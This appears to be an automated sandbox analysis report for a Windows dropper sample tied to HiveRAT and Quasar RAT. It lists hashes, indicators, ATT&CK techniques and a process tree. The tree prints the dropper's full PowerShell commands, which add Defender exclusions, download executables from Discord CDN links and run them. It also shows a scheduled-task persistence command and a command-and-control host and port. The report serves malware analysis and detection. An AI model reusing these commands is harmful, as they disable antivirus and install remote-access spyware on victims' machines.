hiverat | 1aec33c9dc704ad71932eee6e128c9eb0908cab49d85f5a0f788484777a68a57

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7-en-20210920
submitted
30-10-2021 08:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d7bda4ea100c3b9b58d9a9095628c064.exe
Size

72KB
MD5

d7bda4ea100c3b9b58d9a9095628c064
SHA1

70cb92dfc7e0dd76d7db1ee2877d87be8be8b638
SHA256

1aec33c9dc704ad71932eee6e128c9eb0908cab49d85f5a0f788484777a68a57
SHA512

56b0b05499881cd07aa9efb640d89b1debe2ac3e5378057b350f91d039056799859b53ad330e83af7f79d223bb234df2e1b32a40b3becc7c295049704606f424

Score

10^/10

hiverat quasar anubisv2 aspackv2 persistence rat spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip

Extracted

Family

quasar

Version

1.4.0

Botnet

Anubisv2

yoworldservices.space:1338

Mutex

48e1f30b-026f-45d4-b8f7-2bd40381b7db

Attributes

encryption_key
0411D8B9B23547F86733347B0634010F112E158F
install_name
dlscord.exe
log_directory
dlscordLogs
reconnect_delay
3000
startup_key
dlscord
subdirectory
dlscord

Signatures

HiveRAT
HiveRAT is an improved version of FirebirdRAT with various capabilities.
rat stealer hiverat

Quasar Payload 3 IoCs

resource	yara_rule
behavioral1/files/0x0006000000012616-170.dat	family_quasar
behavioral1/files/0x0006000000012616-175.dat	family_quasar
behavioral1/files/0x0006000000012616-172.dat	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

HiveRAT Payload 15 IoCs

resource	yara_rule
behavioral1/memory/1256-133-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-128-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-127-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-135-0x000000000044CB2E-mapping.dmp	family_hiverat
behavioral1/memory/1256-134-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-141-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-152-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-154-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-155-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-153-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-159-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-162-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-163-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1256-164-0x0000000000400000-0x0000000000454000-memory.dmp	family_hiverat
behavioral1/memory/1740-176-0x0000000002390000-0x0000000002FDA000-memory.dmp	family_hiverat

ASPack v2.12-2.42 4 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0008000000012634-131.dat	aspack_v212_v242
behavioral1/files/0x0008000000012634-137.dat	aspack_v212_v242
behavioral1/files/0x0008000000012634-130.dat	aspack_v212_v242
behavioral1/files/0x0008000000012634-143.dat	aspack_v212_v242

Blocklisted process makes network request 5 IoCs

flow	pid	Process
5	1456	powershell.exe
7	676	powershell.exe
9	1728	powershell.exe
11	588	powershell.exe
13	2040	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 5 IoCs

pid	Process
520	hivee.exe
1160	BITBACKK.exe
1052	tbPLVy.exe
1256	hivee.exe
1684	dlscord.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000012604-123.dat	upx
behavioral1/files/0x0008000000012604-129.dat	upx
behavioral1/files/0x0008000000012604-125.dat	upx
behavioral1/files/0x0008000000012604-124.dat	upx

Loads dropped DLL 6 IoCs

pid	Process
1688	powershell.exe
600	powershell.exe
600	powershell.exe
1160	BITBACKK.exe
1160	BITBACKK.exe
1740	explorer.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\spotiify = "C:\\Users\\Admin\\AppData\\Local\\spotiify\\spotiify.exe"	BITBACKK.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Avast Essentials = "C:\\Users\\Admin\\AppData\\Roaming\\Avast.exe"	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	regedit.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
1160	BITBACKK.exe
1160	BITBACKK.exe
1160	BITBACKK.exe
1160	BITBACKK.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 520 set thread context of 1256	520	hivee.exe	45

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Uninstall.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javaw.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSACCESS.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe	tbPLVy.exe
File opened for modification	C:\Program Files\JoinImport.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\wab.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSOUC.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\updater.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\ONELEV.EXE	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javaws.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre7\bin\keytool.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre7\bin\kinit.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaire.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdateOnDemand.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre7\bin\java.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javaw.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\Chess.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleCrashHandler64.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\INFOPATH.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\Hearts.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Mail\wabmig.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Install\{4B28807E-4FD3-4985-9D22-18A6C84FC725}\chrome_installer.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_pwa_launcher.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleUpdateCore.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE	tbPLVy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\crashreporter.exe	tbPLVy.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\uninstall.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Defender\MSASCui.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Windows Mail\WinMail.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\WinMail.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\unpack200.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe	tbPLVy.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\bckgzm.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\GoogleCrashHandler.exe	tbPLVy.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OIS.EXE	tbPLVy.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
600	schtasks.exe

Runs .reg file with regedit 1 IoCs

pid	Process
836	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1412	powershell.exe
1416	powershell.exe
2044	powershell.exe
1456	powershell.exe
676	powershell.exe
1728	powershell.exe
588	powershell.exe
2040	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
1688	powershell.exe
1688	powershell.exe
1688	powershell.exe
600	powershell.exe
600	powershell.exe
600	powershell.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
992	powershell.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe
1256	hivee.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1256	hivee.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	588	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	600	powershell.exe
Token: SeDebugPrivilege	520	hivee.exe
Token: SeDebugPrivilege	1256	hivee.exe
Token: SeDebugPrivilege	1740	explorer.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	1160	BITBACKK.exe
Token: SeShutdownPrivilege	1160	BITBACKK.exe
Token: SeDebugPrivilege	1684	dlscord.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1160	BITBACKK.exe
1160	BITBACKK.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1524 wrote to memory of 1612	1524	d7bda4ea100c3b9b58d9a9095628c064.exe	27
PID 1524 wrote to memory of 1612	1524	d7bda4ea100c3b9b58d9a9095628c064.exe	27
PID 1524 wrote to memory of 1612	1524	d7bda4ea100c3b9b58d9a9095628c064.exe	27
PID 1524 wrote to memory of 1612	1524	d7bda4ea100c3b9b58d9a9095628c064.exe	27
PID 1524 wrote to memory of 620	1524	d7bda4ea100c3b9b58d9a9095628c064.exe	28
PID 1524 wrote to memory of 620	1524	d7bda4ea100c3b9b58d9a9095628c064.exe	28
PID 1524 wrote to memory of 620	1524	d7bda4ea100c3b9b58d9a9095628c064.exe	28
PID 1524 wrote to memory of 620	1524	d7bda4ea100c3b9b58d9a9095628c064.exe	28
PID 620 wrote to memory of 1416	620	cmd.exe	32
PID 620 wrote to memory of 1416	620	cmd.exe	32
PID 620 wrote to memory of 1416	620	cmd.exe	32
PID 620 wrote to memory of 1416	620	cmd.exe	32
PID 1612 wrote to memory of 1412	1612	cmd.exe	33
PID 1612 wrote to memory of 1412	1612	cmd.exe	33
PID 1612 wrote to memory of 1412	1612	cmd.exe	33
PID 1612 wrote to memory of 1412	1612	cmd.exe	33
PID 620 wrote to memory of 2044	620	cmd.exe	34
PID 620 wrote to memory of 2044	620	cmd.exe	34
PID 620 wrote to memory of 2044	620	cmd.exe	34
PID 620 wrote to memory of 2044	620	cmd.exe	34
PID 620 wrote to memory of 1456	620	cmd.exe	35
PID 620 wrote to memory of 1456	620	cmd.exe	35
PID 620 wrote to memory of 1456	620	cmd.exe	35
PID 620 wrote to memory of 1456	620	cmd.exe	35
PID 620 wrote to memory of 676	620	cmd.exe	36
PID 620 wrote to memory of 676	620	cmd.exe	36
PID 620 wrote to memory of 676	620	cmd.exe	36
PID 620 wrote to memory of 676	620	cmd.exe	36
PID 620 wrote to memory of 1728	620	cmd.exe	37
PID 620 wrote to memory of 1728	620	cmd.exe	37
PID 620 wrote to memory of 1728	620	cmd.exe	37
PID 620 wrote to memory of 1728	620	cmd.exe	37
PID 620 wrote to memory of 588	620	cmd.exe	38
PID 620 wrote to memory of 588	620	cmd.exe	38
PID 620 wrote to memory of 588	620	cmd.exe	38
PID 620 wrote to memory of 588	620	cmd.exe	38
PID 620 wrote to memory of 2040	620	cmd.exe	39
PID 620 wrote to memory of 2040	620	cmd.exe	39
PID 620 wrote to memory of 2040	620	cmd.exe	39
PID 620 wrote to memory of 2040	620	cmd.exe	39
PID 620 wrote to memory of 1520	620	cmd.exe	40
PID 620 wrote to memory of 1520	620	cmd.exe	40
PID 620 wrote to memory of 1520	620	cmd.exe	40
PID 620 wrote to memory of 1520	620	cmd.exe	40
PID 1520 wrote to memory of 836	1520	powershell.exe	41
PID 1520 wrote to memory of 836	1520	powershell.exe	41
PID 1520 wrote to memory of 836	1520	powershell.exe	41
PID 1520 wrote to memory of 836	1520	powershell.exe	41
PID 620 wrote to memory of 1688	620	cmd.exe	42
PID 620 wrote to memory of 1688	620	cmd.exe	42
PID 620 wrote to memory of 1688	620	cmd.exe	42
PID 620 wrote to memory of 1688	620	cmd.exe	42
PID 1688 wrote to memory of 520	1688	powershell.exe	43
PID 1688 wrote to memory of 520	1688	powershell.exe	43
PID 1688 wrote to memory of 520	1688	powershell.exe	43
PID 1688 wrote to memory of 520	1688	powershell.exe	43
PID 620 wrote to memory of 600	620	cmd.exe	44
PID 620 wrote to memory of 600	620	cmd.exe	44
PID 620 wrote to memory of 600	620	cmd.exe	44
PID 620 wrote to memory of 600	620	cmd.exe	44
PID 520 wrote to memory of 1256	520	hivee.exe	45
PID 520 wrote to memory of 1256	520	hivee.exe	45
PID 520 wrote to memory of 1256	520	hivee.exe	45
PID 520 wrote to memory of 1256	520	hivee.exe	45

C:\Users\Admin\AppData\Local\Temp\d7bda4ea100c3b9b58d9a9095628c064.exe
"C:\Users\Admin\AppData\Local\Temp\d7bda4ea100c3b9b58d9a9095628c064.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1612
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Extracting Files, Please Wait..','Error','OK','Error')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip', (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip'))" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')" & powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip')" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1416
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910938065547284/Cert.reg', (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1456
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910945422368798/hivee.exe', (Join-Path -Path $env:AppData -ChildPath 'hivee.exe'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:676
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/894910956184961054/BITBACKK.exe', (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/897976122757746728/dlscord.exe', (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:588
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/612689775702573066/898608127153410129/PaladinsHackFIX.zip', (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip'))"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'Cert.reg')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\SysWOW64\regedit.exe
      "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\Cert.reg"
      4⤵
      Adds Run key to start application
      Runs .reg file with regedit
      PID:836
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hivee.exe')"
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Users\Admin\AppData\Roaming\hivee.exe
      "C:\Users\Admin\AppData\Roaming\hivee.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:520
    - - C:\Users\Admin\AppData\Roaming\hivee.exe
        
        "C:\Users\Admin\AppData\Roaming\hivee.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:1256
      - C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs
        6⤵
        
        PID:1672
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'BITBACKK.exe')"
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:600
  - - C:\Users\Admin\AppData\Roaming\BITBACKK.exe
      "C:\Users\Admin\AppData\Roaming\BITBACKK.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1160
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'dlscord.exe')"
    3⤵
    PID:1740
  - - C:\Users\Admin\AppData\Roaming\dlscord.exe
      "C:\Users\Admin\AppData\Roaming\dlscord.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1684
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "dlscord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\dlscord.exe" /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:600
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "Start-Process -FilePath (Join-Path -Path ($pwd).path -ChildPath 'PaladinsHackFIX.zip')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:992

C:\Users\Admin\AppData\Local\Temp\tbPLVy.exe
C:\Users\Admin\AppData\Local\Temp\tbPLVy.exe
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1052
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\03530cc0.bat" "
  2⤵
  PID:1600

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"
  2⤵
  - Adds Run key to start application
  PID:1552

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/520-151-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

Filesize
4KB

Download
memory/520-119-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

Filesize
4KB

Download
memory/600-144-0x0000000002530000-0x000000000317A000-memory.dmp

Filesize
12.3MB

Download
memory/600-146-0x0000000002530000-0x000000000317A000-memory.dmp

Filesize
12.3MB

Download
memory/600-147-0x0000000002530000-0x000000000317A000-memory.dmp

Filesize
12.3MB

Download
memory/836-117-0x0000000000370000-0x0000000000371000-memory.dmp

Filesize
4KB

Download
memory/992-184-0x00000000023F1000-0x00000000023F2000-memory.dmp

Filesize
4KB

Download
memory/992-185-0x00000000023F2000-0x00000000023F4000-memory.dmp

Filesize
8KB

Download
